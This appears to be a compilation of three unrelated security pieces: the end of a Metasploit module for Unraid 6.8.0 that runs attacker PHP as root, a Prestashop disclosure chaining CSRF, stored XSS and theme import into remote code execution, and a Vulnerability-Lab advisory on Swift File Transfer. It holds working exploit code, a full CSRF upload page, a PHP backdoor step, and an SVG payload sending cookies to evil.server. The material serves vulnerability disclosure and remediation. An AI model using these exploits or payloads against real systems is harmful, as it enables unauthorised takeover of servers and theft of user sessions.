      update_info(
        info,
'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',
'Description' => %q{
          This module exploits two vulnerabilities affecting Unraid 6.8.0.
          An authentication bypass is used to gain access to the administrative
          interface, and an insecure use of the extract PHP function can be abused
          for arbitrary code execution as root.
        },
'Author' =>
          [
'Nicolas CHATELAIN <n.chatelain@sysdream.com>'
          ],
'References' =>
          [
            [ 'CVE', '2020-5847' ],
            [ 'CVE', '2020-5849' ],
            [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
            [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
          ],
'License' => MSF_LICENSE,
'Platform' => ['php'],
'Privileged' => true,
'Arch' => ARCH_PHP,
'Targets' =>
          [
            [ 'Automatic', {}]
          ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 10 2020'
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])
      ]
    )
  end

  def check
    res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
'method' => 'GET'
    )

    unless res
      return CheckCode::Unknown('Connection failed')
    end

    unless res.code == 200
      return CheckCode::Safe('Unexpected reply')
    end

    /\sVersion:\s(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})&nbsp;/ =~ res.body

    if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')
      return CheckCode::Appears("Unraid version #{version} appears to be vulnerable")
    end

    CheckCode::Safe
  end

  def exploit
    begin
      vprint_status('Sending exploit code')
      res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
'method' => 'GET',
'encode_params' => false,
'vars_get' =>
        {
'path' => 'x',
'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal')
        }
      )

      if res.nil?
        print_good('Request timed out, OK if running a non-forking/blocking payload...')
      elsif res.code == 302
        fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')
      else
        print_warning("Unexpected response code #{res.code}, please check your payload.")
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end

##########################################################################
#              Prestashop <= 1.7.6.4 Multiple Vulnerabilities            #
##########################################################################

Author - Sivanesh Ashok | @sivaneshashok <https://twitter.com/sivaneshashok>
| stazot.com

Last Modified: 2020-04-11
Vendor       : https://www.prestashop.com/
Version      : <= 1.7.6.4
Tested on    : 1.7.6.4


--[ Table of Contents

00 - Introduction

01 - Exploit

02 - Cross-Site Request Forgery (CSRF)
    02.1 - Exploitation

03 - Stored Cross-Site Scripting
    03.1 - Exploitation

04 - Escalation to RCE
    04.1 - Exploitation

05 - Solution

06 - Contact



--[ 00 - Introduction

Prestashop is an open source e-commerce solution written in PHP. This
article is about the CSRF and XSS vulnerabilities I discovered and how it
was chained and escalated to single-click RCE, as an unauthenticated
attacker.



--[ 01 - Exploit

I wrote an exploit that chains the vulnerabilities described below to
achieve single-click RCE, as an unauthenticated attacker. It can be found
in the link below.

https://github.com/staz0t/exploits/blob/master/SA20200411_prestashop_csrf_to_rce.html

You would need a Prestashop theme zip file to achieve RCE. A simple theme
can be downloaded from here - https://github.com/PrestaShop/classic-rocket

Download the theme and add a PHP backdoor in the theme zip file. Host it in
a webserver. Now edit the JS variables in the exploit and host it on a
webpage, send the link to the admin. Once the admin visits the webpage, the
PHP file will be uploaded and can be visited in the link below

http://target.server/themes/{theme-name}/{php-file-name}.php



--[ 02 - Cross-Site Request Forgery (CSRF)

An unauthenticated attacker can exploit this vulnerability to trick an
authenticated user with 'Products Edit' permission to upload files to the
'File Manager'. This application does not check for a CSRF token in the
File Manager's upload endpoint, {adminurl}/filemanager/upload.php, which
causes this issue.


--[ 02.1 - Exploitation

To exploit this vulnerability, an attacker should craft a CSRF webpage, and
trick an authenticated user with 'Products Edit' permission to visit the
webpage.

1. Create a webpage that automatically submits a POST upload request to the
file manager.

For example,

----[ code segment ]----

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST",
"http:\/\/prestashop.localhost-windows.com\/admin501to49xz\/filemanager\/upload.php",
true);
        xhr.setRequestHeader("Content-Type", "multipart\/form-data;
boundary=---------------------------6487332036660663652470259777");
        xhr.withCredentials = true;
        var body =
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"path_thumb\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777\r\n" +
"Content-Disposition: form-data; name=\"file\";
filename=\"csrfpoc.svg\"\r\n" +
"Content-Type: image/svg+xml\r\n" +
"\r\n" +
"\x3csvg xmlns=\"http://www.w3.org/2000/svg\" /\x3e\r\n" +
"\r\n" +
"-----------------------------6487332036660663652470259777--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
</script>
</body>
</html>

----[ code segment ]----

2. Send the link of the webpage to the victim.

The above code segment uploads csrfpoc.svg when the victim user visits the
webpage that hosts this code.



--[ 03 - Stored Cross-Site Scripting

An attacker can exploit this vulnerability to execute javascript code in
the context of the victim. The vulnerability is in the 'File Manager'.
Backed users with 'Products Edit' permission can upload files, with
whitelisted extension.

By default, the following extensions are allowed to be uploaded in the File
Manager.

jpg, jpeg, png, gif, bmp, tiff, svg, pdf, mov, mpeg, mp4, avi, mpg, wma,
flv, webm

As mentioned, SVG files are allowed and SVG files can contain javascript
code in them. This allows a backend user with 'Products Edit' permission to
run arbitrary javascript code in the context of a victim.


--[ 03.1 - Exploitation

An unauthenticated attacker can chain the previously explained CSRF with
this vulnerability to trick an authenticated user with 'Products Edit'
permission to upload an SVG file with malicious javascript code.

1. Create an SVG file with javascript payload in it.
    For example,
<svg xmlns="http://www.w3.org/2000/svg" onload="document.location='
http://evil.server/?c='+document.cookie;" />
    This payload sends the victim's cookies to attacker's server

2. Create a webpage that automatically submits a POST upload request, with
the contents of the malicious SVG file.

3. Host the webpage and send the link to the victim with 'Products Edit'
permission.

4. When the victim opens the URL, the SVG file with the javascript payload
gets uploaded to http://target.server/img/cms/evil.svg

5. Send the SVG link to the target victim. When the victim opens the link,
the cookies of the victim gets sent to the attacker.



--[ 04 - Escalation to Remote Code Execution

By targeting the admin, an attacker can gain RCE in the server. This is
achieved by using the 'Import Theme' functionality.


--[ 04.1 - Exploitation

Theme import functionality can fetch a ZIP file and unpack it to themes/
directory, provided that the ZIP has all the necessary theme files. The ZIP
file could contain a PHP file, and the server will still unzip it to
themes/{theme-name} directory.

An attacker can exploit this feature to upload a theme with a malicious PHP
file to achieve RCE, by using the previously explained CSRF and XSS bug
chain.

1. Create an SVG file with javascript payload that does the following.

    1.1. Opens the 'Import Theme' page and fetches the CSRF token
    1.2. Send a POST request to the theme upload endpoint with the link to
         the malicious ZIP file

2. Create a webpage that exploits the CSRF to automatically submit a POST
upload request to the file manager's upload endpoint to upload the
malicious SVG file.

3. Send the webpage's link to an authenticated user with 'Products Edit'
permission (or the admin). This uploads the SVG file to the server.
    http://target.server/img/cms/exploit.svg

4. Now send the uploaded SVG file's link to the admin. When the admin opens
the link, the theme with the PHP file gets imported. It can be opened with
the following link.
    http://target.server/themes/{theme-name}/backdoor.php


Putting all this together, an unauthenticated attacker can achieve
single-click RCE by targeting the admin (SuperUser) of the server.



--[ 05 - Solution

1. Implement CSRF protection in {adminurl}/filemanager/upload.php endpoint.

2. Disallow SVG upload in File Manager or validate the SVG file's contents
before uploading.

3. Consider implementing a validation process to check for PHP files before
importing the theme ZIP file.



--[ 06 - Contact

Name   : Sivanesh Ashok

Twitter: @sivaneshashok <https://twitter.com/sivaneshashok>

Website: https://stazot.com

Document Title:
===============
Swift File Transfer Mobile - Multiple Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2205


Release Date:
=============
2020-04-17


Vulnerability Laboratory ID (VL-ID):
====================================
2205


Common Vulnerability Scoring System:
====================================
5


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Swift File Transfer is World’s fastest app to share installed apps,
photos, files, folders and videos at with high speed of upto
8mbps with your friends and family without using intenet, data cable,
mobile data, Wi-Fi, nfc etc. Now transfer GB's of data in
the blink of an eye. SFT - Swift File Transfer - Easier Faster & Safer.

(Copy of the Homepage:
https://apps.apple.com/in/app/sft-swift-file-transfer/id1162606088)
(Copy of the Homepage:
https://play.google.com/store/apps/details?id=com.sft.fileshare)
(Copy of the Homepage:
https://appworld.blackberry.com/webstore/content/59986064/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Swift File Transfer mobile application
for ios, blackberry and android.


Affected Product(s):
====================
Kunal Mahajan
Product: SFT - Swift File Transfer  (Android v1.1.2) (iOS v1.1.2)
(Blackberry v1.0.19)


Vulnerability Disclosure Timeline:
==================================
2020-04-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
No authentication (guest)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
1.1
The information disclosure issue is located in the list or download
function with the path parameter. The exception-handling
does not cut of the native application path. Thus allows an attacker to
directly insert the information for the list or download
function with the path request. The issue becomes quick visible after
triggering an unexpected error by including non existing
path environemnt variables. The default setup to make only the native
app path visible is not secure configured to stay invisible.
In other applications with the same functionalities the full native path
is not delivered by the secure configuration of the wifi
web-server service.


1.2
The xss web vulnerabilities are located in the `path` parameter of the
`list` and `download` exception-handling. Remote attackers
are able to inject own malicious script code to the path parameter to
manipulate the error message output context of the ui. The
request method to inject is GET and the attack vector is located on the
client-side of the mobile ios web-application.
Successful exploitation of the vulnerability results in session
hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation
of affected or connected application modules.


1.3
The persistent input validation web vulnerability is located in the
devicename that is displayed in the front panel on each request
for send / receive files via wifi (default port: 22222). Remote
attackers with local idevice user account are able to inject own
malicious script code as devicename to provoke an execution of the code
in the wifi sharing ui when listing the item. The devicename
is insecure transmitted into the wifi ui interface which results in a
persistent script code execution to compromise the application.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected or connected
application modules.


Proof of Concept (PoC):
=======================
1.1
The information disclosure vulnerability can be exploited by remote
attackers with networks access only and without user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.


PoC: Exploitation
http://localhost:22222/download?path=-_-*


PoC: Payload (Path)
/var/mobile/Containers/Data/Application/E0DF0179-AC43-41F2-9488-2F733B784BCB/Documents/Server/-_-*



1.2
The client-side cross site web vulnerabilities can be exploited by
remote attackers with networks access only and low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.


PoC: Vulnerable Source
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>HTTP
Error 404</title></head><body><h1>
HTTP Error 404:
"/var/mobile/Containers/Data/Application/E0DF0179-AC43-41F2-9488-2F733B784BCB/Documents/Server/>
">"><img src="evil.source" onload=alert(document.domain)>"
[MALICIOUS SCRIPT CODE INJECT]does not exist</h1><h3></h3></body></html>


PoC: Exploitation
http://localhost:22222/download?path=>"><img src="evil.source"
onload=alert(document.domain)>
http://localhost:22222/list?path=>"><img src="evil.source"
onload=alert(document.domain)>



1.3
The local script code injection web vulnerability can be exploited by
local attackers with idevice user account and low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open your local idevice settings in the configs
2. Change the local devicename to a script code payload
3. Save the settings
4. Open the vulnerable mobile application
5. Execution occurs on open of the ui on port 22222
6. Successful reproduce of the vulnerability!


PoC: Vulnerable Source
<div class="panel panel-default" id="toobar">
<p>[MALICIOUS SCRIPT CODE INJECT VIA DEVICENAME - EXECUTION
POINT!]</p>
<div id="toobar-button">
<button type="button" class="btn btn-primary fileinput-button"
id="upload-file" style="">
<span class="glyphicon glyphicon-upload"></span> Upload Files
<input id="fileupload" name="files[]" multiple="" type="file">
</button>
<button type="button" class="btn btn-default" id="download-all">
<span class="glyphicon glyphicon-download"></span> Download All
</button>
</div>
<div class="clear"></div>
</div>


Security Risk:
==============
The security risk of the multiple web vulnerabilities in the mobile
web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com